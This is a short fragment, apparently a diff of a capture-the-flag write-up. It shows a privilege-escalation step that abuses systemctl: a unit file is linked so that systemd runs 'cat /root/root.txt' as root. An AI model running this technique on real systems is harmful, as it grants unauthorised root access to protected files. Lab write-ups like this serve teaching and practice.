0x00 Introduction

 WantedBy=multi-user.target' > $priv

-This script tells systemd to run our command (cat /root/root.txt
+This tells systemd to run cat /root/root.txt

 /bin/systemctl link $priv